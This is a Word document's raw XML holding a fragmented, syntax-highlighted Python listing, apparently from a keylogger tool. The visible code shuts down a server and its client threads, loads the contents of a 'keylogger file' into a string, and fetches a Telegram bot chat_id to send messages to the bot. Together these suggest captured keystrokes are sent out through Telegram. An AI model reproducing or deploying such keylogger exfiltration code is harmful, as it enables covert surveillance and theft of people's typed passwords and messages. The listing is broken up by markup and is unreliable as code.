        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="614" w:name="l267"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">267  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="614"/>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15" w:name="l268"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">268  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="615"/>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616" w:name="l269"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">269  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="61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17" w:name="l270"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">270  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="61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topping Server.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18" w:name="l271"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">271  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="618"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="619" w:name="l272"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">272  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="619"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">client </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>client_threads</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">:        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Kill clients</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="620" w:name="l273"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">273  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="620"/>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21" w:name="l274"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">274  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="621"/>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22" w:name="l275"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">275  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="62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23" w:name="l276"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">276  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="62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Killing client.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24" w:name="l277"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">277  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="624"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="625" w:name="l278"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">278  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="625"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">try:                                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Kill Server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="626" w:name="l279"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">279  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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down server'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="627" w:name="l280"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">280  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="627"/>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28" w:name="l281"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">281  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="628"/>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29" w:name="l282"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">282  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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30" w:name="l283"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">283  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="630"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="631" w:name="l284"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">284  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="631"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">server </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>= None</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="632" w:name="l285"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">285  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="632"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="633" w:name="l286"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">286  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="633"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="634" w:name="l287"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">287  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="634"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Load a content of keylogger file into a string variable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="635" w:name="l288"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">288  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="635"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">def </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36" w:name="l289"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">289  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="63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Loading file {}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37" w:name="l290"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">290  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="637"/>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ile_name</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'r'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="638" w:name="l291"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">291  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="638"/>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f</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>read</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>().</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>strip</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="639" w:name="l292"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">292  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="639"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="640" w:name="l293"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">293  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="640"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="641" w:name="l294"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">294  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="641"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="642" w:name="l295"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">295  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="642"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Telegram Bot. Get text and chat_id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="643" w:name="l296"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">296  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="643"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>telegram_bot_get_chati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44" w:name="l297"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">297  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="644"/>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GETME</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="645" w:name="l298"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">298  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="645"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">getme </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>loads</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</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46" w:name="l299"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">299  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="64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GetMe: {}'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>format</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>getme</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="647" w:name="l300"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">300  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="647"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>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48" w:name="l301"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">301  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="648"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">chat_id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id"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="649" w:name="l302"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">302  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="649"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">return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50" w:name="l303"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">303  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="650"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="651" w:name="l304"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">304  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="651"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="652" w:name="l305"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">305  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="652"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Sends a message to a Telegram Bot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="653" w:name="l306"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">306  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="653"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
